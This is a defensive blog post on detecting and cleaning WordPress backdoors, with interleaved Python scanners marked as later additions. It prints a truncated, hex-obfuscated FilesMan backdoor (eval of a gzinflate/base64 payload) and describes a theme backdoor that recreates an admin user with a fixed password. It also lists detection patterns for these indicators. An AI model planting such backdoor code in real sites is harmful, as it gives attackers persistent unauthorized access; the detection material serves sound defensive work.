
What is a WordPress Backdoor?

Thousands of WordPress sites are infected every year, and the number is rising. The hacked sites are then used to spread fraud and spam, often without their owners or developers being aware of the infection. An infection may or may not be persistent, and a WordPress backdoor is what gives an attacker that persistence: it is code that allows unauthorized, repeatable access to the server. Often it is a malicious file hidden somewhere in the installation; at other times it is an infected plugin. New variants of the WordPress backdoor hack surface every month.

Hackers are constantly trying to inject WordPress backdoors, and several plugins over the years have been used to spread infections, so the threat can come from anywhere. Removing a WordPress backdoor after the fact can be a time- and resource-consuming process, whereas preventive measures always limit the damage: a well-secured WordPress site can at least delay an attack if it cannot prevent it. This post covers finding and fixing a WordPress backdoor.

What leads to a WordPress Backdoor Hack?

Setting up a WordPress site is reasonably easy, but multiple loopholes can pave the way for a WordPress backdoor. For simplicity, we can narrow them down to a prime few:

  • A buggy plugin or theme.
  • Weak or default login credentials for your site.
  • Weak file permissions that expose sensitive files.
  • No firewall or other security solution in place.
  • Outdated installations.
  • Sharing an infected server with other websites. Ask your service provider for subnetting.

Finding WordPress Backdoor

Locating WordPress Backdoor in Themes

Inactive themes are the best place to hide a WordPress backdoor. Hackers know this and often look for such themes on your site, because you are less likely to check a theme you are not using. Every WP theme contains a critical file called functions.php, which can call native PHP, WordPress and other functions; in simple terms, it can perform any kind of operation. Attackers therefore often inject code into this file to obtain a WordPress backdoor. One such example is given in the image below.

Image: malicious code injected into a theme's functions.php

This is malicious code in the file functions.php. It is triggered when the attacker visits the URL www.yoursite.com/wp-includes/registration.php, and the function then creates a new user with

id: backdooradmin

password: Pa55W0rd.

Thus, even if you delete the user, it is created again whenever this URL is visited. This is a typical example of a WordPress backdoor. Note that the code can only be injected after gaining access to the server first, for instance through an open FTP port or another loophole.


Locating WordPress Backdoor in Plugins

A WordPress backdoor hack is often due to a buggy plugin, and many plugins have been found vulnerable over the years. This year the latest was Contact Form 7, which has more than 5 million active users; the bug led to privilege escalation. When plugin files are modified, the change may not be visible on the Dashboard, but a search over FTP can reveal such files. To look legitimate, backdoor files are often named as help files. The reasons backdoors are found in plugins are:

  • Unused plugins are more likely to be infected, simply because they can hide backdoors for a long time.
  • Untrusted and unpopular plugins are often poorly coded, which increases the chances of a WordPress backdoor hack.
  • Outdated plugins are more likely to be targeted, because many sites still run them without updating.
  • Buggy plugins can be used to modify other core files.

Therefore, look out for any unknown plugins, and remove all the unused ones!

Locating WordPress backdoor in installation files

Modifying core files comes next, after a plugin is infected. There may be rogue code in base files, or new files may appear. At times the backdoor looks like gibberish, as here:

$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<=DqV@&(BjX'~|ge%p+oMJv^);\"k9";
$GLOBALS['ofmhl60'] = ${$t43[20].$t43

This code is obfuscated using known techniques, which makes it harder for a human to read. Look out for such fishy-looking code and remove the files containing it. At times the backdoor also presents itself as a legitimately named file such as xml.php, media.php or plugin.php, so don't skip any file just because it looks legitimate. There are other techniques as well to make code difficult to read.

Also, look out for the keyword FilesMan in your files. For instance, this is the dump of the infamous backdoor Filesman:02. This backdoor is hard to detect and not visible in logs; it is used to steal passwords and other details.

<?php
$auth_pass = "";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/t..NRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");
?>

The code in the 6th line is in hex form; decoded, it reads preg_replace("/.*/e","eval(gzinflate(base64_decode('...')));","."), with the base64 payload in place of the dots. There are tools available online to decode hex characters, so use them. Note also the /e modifier on preg_replace: it makes PHP evaluate the replacement string as code (the modifier was removed in PHP 7), so its presence is a strong indicator on its own. The attacker can likewise hide code using base64 encoding, so treat it the same way. The keyword FilesMan is present in the 4th line, and variants of this infection carry it. At times the code may also tamper with sensitive files like .htaccess, so take a good look through those too!

How to Fix WordPress Backdoor Hack?

Comparing Checksum

The first step is to compare checksums, a heuristic determination of file integrity. This can be done by manual inspection, and there are also free automatic tools for the purpose. Checksums are available not only for core files but for plugins and themes too. You can also maintain a personal blacklist, built from lists available in the public domain. Once checksums do not match, proceed to remove WordPress backdoors manually.


Core Files Integrity

Secondly, once files show different checksum values, inspect them manually. It is very likely that a WordPress backdoor hack has tampered with files, so the integrity of the installation files should be verified. Begin by downloading a fresh copy of WordPress.

$ mkdir WordPress

$ cd WordPress

These commands create a directory named WordPress and switch into it.

$ wget https://github.com/WordPress/WordPress/archive/4.9.8.zip 

$ unzip 4.9.8.zip

Now download the latest version of WordPress (4.9.8 in this case) using the first command, and extract it with the second (the archive is a zip, so unzip rather than tar is the right tool). After that comes the critical step: $ diff path/to/your/wp-cron.php WordPress-4.9.8/wp-cron.php. This compares the two files and, since the WordPress backdoor would have edited your files, shows the changes; diff -r path/to/your/site WordPress-4.9.8 does the same for the whole directory tree. A few files, however, are dynamic, like xmlrpc.php, which lets users and services interact with the site through RPC. Hackers know this and often try to hide backdoors there, so check it thoroughly to find and remove WordPress backdoors.
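The checksum-then-diff procedure above, as an added example in Python (not code from the original post or from any Astra tool): it hashes a fresh copy and the installed copy, buckets files into modified, unexpected and missing, and prints for each modified file the same unified diff that the diff command gives. The file contents, paths and the tamper line are constructed stand-ins; on a real site the two dictionaries would be filled by walking the freshly extracted archive and the web root.

```python
import difflib
import hashlib
from typing import Dict, List

# Constructed stand-ins, not real files: the contents of a fresh WordPress
# copy and of the installed site, keyed by path relative to the web root.
# In practice REFERENCE comes from walking the freshly extracted archive of
# the same version and INSTALLED from walking the live web root.
TAMPER_LINE = "$GLOBALS['ofmhl60'] = 'constructed tamper marker';"

REFERENCE: Dict[str, str] = {
    "wp-cron.php": "<?php\n// constructed stand-in for wp-cron.php\nspawn_cron();\n",
    "wp-settings.php": "<?php\nrequire 'wp-load.php';\n",
    "xmlrpc.php": "<?php\n// constructed stand-in for xmlrpc.php\n",
}
INSTALLED: Dict[str, str] = {
    # the same file with one line inserted, as a backdoor edit would leave it
    "wp-cron.php": "<?php\n// constructed stand-in for wp-cron.php\n" + TAMPER_LINE + "\nspawn_cron();\n",
    "wp-settings.php": "<?php\nrequire 'wp-load.php';\n",
    # a file the fresh copy does not contain at all
    "wp-includes/xml.php": "<?php\n// not part of any release\n",
}


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def checksum_report(reference: Dict[str, str], installed: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify installed files against the reference copy by hash.
    'modified' and 'unexpected' are the candidates to inspect; 'missing'
    usually means a file was deleted or the two versions differ."""
    ref = {p: sha256_hex(c) for p, c in reference.items()}
    site = {p: sha256_hex(c) for p, c in installed.items()}
    return {
        "modified": sorted(p for p in site if p in ref and site[p] != ref[p]),
        "unexpected": sorted(p for p in site if p not in ref),
        "missing": sorted(p for p in ref if p not in site),
    }


def unified_diff(reference: Dict[str, str], installed: Dict[str, str], path: str) -> List[str]:
    """The same view the diff command gives, for one file."""
    return list(difflib.unified_diff(
        reference[path].splitlines(), installed[path].splitlines(),
        fromfile="fresh/" + path, tofile="site/" + path, lineterm=""))


def injected_lines(reference: Dict[str, str], installed: Dict[str, str], path: str) -> List[str]:
    """Lines present on the site but absent from the fresh copy: what the
    edit added, ready for review before the file is replaced."""
    return [line[1:] for line in unified_diff(reference, installed, path)
            if line.startswith("+") and not line.startswith("+++")]


if __name__ == "__main__":
    report = checksum_report(REFERENCE, INSTALLED)
    for bucket, paths in report.items():
        print(f"{bucket}: {paths}")
    for path in report["modified"]:
        print("\n".join(unified_diff(REFERENCE, INSTALLED, path)))
```

WordPress also publishes per-release MD5 checksums for core files (the list that wp core verify-checksums consults); switching sha256_hex to md5 lets checksum_report run against that list instead of a downloaded archive.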

Encodings

At times files show as modified but are unreadable to you. Then you can begin the WordPress backdoor hack cleanup by looking for base64 encodings, which is where grep works wonders. Use the following command:

find . -name "*.php" -exec grep "base64" '{}' \; -print &> output.txt

This command lists every base64 hit, with the file it came from, in output.txt, from where you can decode them to plaintext with online tools. To search files other than .php, just replace *.php in the command. The malicious code could be in hex format too, in which case you can use grep -Pr "[\x01\x02\x03]"; for other similar encodings, repeat this step. Delete these files or lines of malicious code to remove WordPress backdoors.
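The grep command above finds the literal string base64, but not the hex-escaped form seen in the FilesMan dump, nor a plaintext backdoor such as the user-creation code in a theme's functions.php. The scanner below, added here as an example and not code from the post or from Astra, serves both the Finding section above and this Encodings section: it checks each line as written and again after decoding \xNN escapes, so the preg_replace("/.*/e", ...) line is reported as eval(gzinflate(base64_decode( even though that text never appears literally. The sample files, the placeholder payload 'AAAA' and the signature names are constructed.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample "files" (path -> contents); they stand in for what
# walking a real install would yield and are not real site content. The
# preg_replace line mirrors the FilesMan dump above, with its base64 payload
# replaced by the placeholder 'AAAA'.
SAMPLE_FILES: Dict[str, str] = {
    "wp-content/themes/twentyseventeen/functions.php": r"""<?php
add_theme_support('post-thumbnails');
function my_excerpt_length($n) { return 20; }
""",
    "wp-content/themes/old-theme/functions.php": r"""<?php
if (strpos($_SERVER['REQUEST_URI'], 'registration.php') !== false) {
    wp_create_user('backdooradmin', 'Pa55W0rd');
}
""",
    "wp-includes/media.php": r"""<?php
$default_action = "FilesMan";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'AAAA'\x29\x29\x29\x3B",".");
""",
}

# (name, regex, path prefix the rule is limited to, or "" for any file).
# These are the indicators the post discusses, not a complete ruleset.
SIGNATURES: List[Tuple[str, str, str]] = [
    ("filesman_marker", r"\bFilesMan\b", ""),
    # the /e modifier makes PHP evaluate the replacement string as code
    ("preg_replace_e_modifier", r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", ""),
    ("eval_of_decoded_payload", r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", ""),
    ("base64_decode_call", r"base64_decode\s*\(", ""),
    ("long_hex_escape_run", r"(?:\\x[0-9A-Fa-f]{2}){8,}", ""),
    # user creation has no business in a theme's functions.php
    ("user_creation_in_theme", r"wp_(?:create|insert)_user\s*\(", "wp-content/themes/"),
]

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_hex_escapes(text: str) -> str:
    """Replace PHP-style \\xNN escapes with the characters they encode."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_file(path: str, contents: str) -> List[Tuple[str, int, str]]:
    """Return (signature, line number, evidence) hits for one file. Each
    line is checked as written and again after hex-decoding, so a payload
    that only reads as eval(...) once decoded is still caught."""
    hits: List[Tuple[str, int, str]] = []
    for line_no, line in enumerate(contents.splitlines(), start=1):
        views = [("raw", line), ("hex-decoded", decode_hex_escapes(line))]
        for name, pattern, prefix in SIGNATURES:
            if prefix and not path.startswith(prefix):
                continue
            for view, text in views:
                match = re.search(pattern, text)
                if match:
                    hits.append((name, line_no, f"{view}: {match.group(0)[:40]}"))
                    break  # one report per signature per line
    return hits


def scan_tree(files: Dict[str, str]) -> Dict[str, List[Tuple[str, int, str]]]:
    """Scan every file and keep only those with at least one hit."""
    report: Dict[str, List[Tuple[str, int, str]]] = {}
    for path, contents in files.items():
        hits = scan_file(path, contents)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_FILES).items():
        for name, line_no, evidence in hits:
            print(f"{path}:{line_no}: {name} ({evidence})")
```

base64_decode is used legitimately in WordPress core, so that rule is only a pointer: combine its hits with the checksum results so a core file whose checksum matches is not flagged, and treat FilesMan, the /e modifier and eval of a decoded payload as the high-confidence indicators.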

Using Server Logs

Server logs can help to remove WordPress backdoors. First, check which files have been edited after a specific date, and go through the FTP logs to see which IPs connected to your server. Keep a tab on recently edited files. Look particularly at the images folder: nobody expects executables in an images folder, and it is often writable, which is why hackers love to hide backdoors there. Also ensure that permissions on sensitive files are appropriate: set them to 444 (r--r--r--) or 440 (r--r-----). Look specifically for any changes in the images folder.
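The three checks in this section (files edited after a date, executables in the images folder, loose permissions) as an added Python example, not from the original post: it builds a small constructed site tree in a temporary directory, sets the modification times and permission bits itself, and audits the result with os.stat. The cut-off date, the paths and the permission values are constructed; the "images folder" is taken to be wp-content/uploads, where a standard install stores media.

```python
import os
import stat
import tempfile
from datetime import datetime, timezone
from typing import Dict, Iterator, List, Tuple

# Cut-off for "recently edited": the date taken from the server or FTP logs.
# 2018-09-01 is a constructed example value.
SINCE = datetime(2018, 9, 1, tzinfo=timezone.utc).timestamp()
DAY = 86400

# Constructed mini site tree (not real WordPress files): relative path ->
# (modification time, permission bits). It holds one recently edited core
# file, a PHP file under uploads, and a wp-config.php left group/world writable.
SAMPLE_TREE: Dict[str, Tuple[float, int]] = {
    "wp-settings.php": (SINCE - 30 * DAY, 0o444),
    "wp-config.php": (SINCE - 30 * DAY, 0o666),
    "wp-includes/media.php": (SINCE + 1 * DAY, 0o444),
    "wp-content/uploads/2018/09/photo.jpg": (SINCE - 5 * DAY, 0o644),
    "wp-content/uploads/2018/09/image.php": (SINCE + 2 * DAY, 0o644),
}

SCRIPT_SUFFIXES = (".php", ".phtml", ".php5", ".php7", ".phar")


def build_sample_site(root: str) -> None:
    """Materialise SAMPLE_TREE under root so the checks run on real stat() data."""
    for rel, (mtime, mode) in SAMPLE_TREE.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("<?php // constructed placeholder\n" if rel.endswith(".php") else "placeholder\n")
        os.utime(full, (mtime, mtime))  # set mtime before removing write bits
        os.chmod(full, mode)


def _walk(root: str) -> Iterator[Tuple[str, os.stat_result]]:
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            yield os.path.relpath(full, root).replace(os.sep, "/"), os.stat(full)


def audit(root: str, since: float) -> Dict[str, List[str]]:
    """Three metadata checks: files changed after the cut-off, scripts under
    uploads, and files writable by group or others (looser than 444/440)."""
    recent, in_uploads, writable = [], [], []
    for rel, st in _walk(root):
        if st.st_mtime > since:
            recent.append(rel)
        if rel.startswith("wp-content/uploads/") and rel.lower().endswith(SCRIPT_SUFFIXES):
            in_uploads.append(rel)
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            writable.append(rel)
    return {
        "recently_modified": sorted(recent),
        "scripts_in_uploads": sorted(in_uploads),
        "group_or_world_writable": sorted(writable),
    }


def run_sample_audit() -> Dict[str, List[str]]:
    """Build the constructed tree in a fresh temp directory and audit it."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    build_sample_site(root)
    return audit(root, SINCE)


if __name__ == "__main__":
    for check, paths in run_sample_audit().items():
        print(f"{check}: {paths}")
```

On a live site, point audit() at the web root and set since from the log entry you are investigating; the recently_modified list is the one to cross-check against the FTP log's connection times.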

Update and Backup

The importance of updating your WordPress website has been emphasized over and over: an outdated installation is as good as an infected one.

If you cannot trace the cause of the WordPress backdoor hack, restore the site from a backup, but only after taking a backup of the current site, and then compare the two.

If you don't have an existing backup and want to replace the core WordPress files with fresh ones, you need to update your WordPress website manually, after taking a backup of the current site.

Moreover, if a vulnerability is reported in a plugin you use, update it immediately; if the patch is taking too long, replace the plugin with an alternative. Stay up to date with the official blogs to get patches at the earliest.

Use WordPress Backdoor Scanner

Humans are prone to errors, and manual inspection is tedious and error-prone, which can let a WordPress backdoor hack recur. The solution is automation. There are quite advanced tools on the market today that can detect and remove WordPress backdoors; one is the Astra malware cleaner, which not only cleans your website but protects it from future infections. It is reasonably priced, gives you a comprehensive view, and saves your precious time and resources!


About The Author

A computer nerd. Loves working with Sqlmap and BeEF (the software) ;) Has experience in wireless pen tests. Owns a chatbot on Pandorabots named Mark1. In free time he can be found saving some goals.
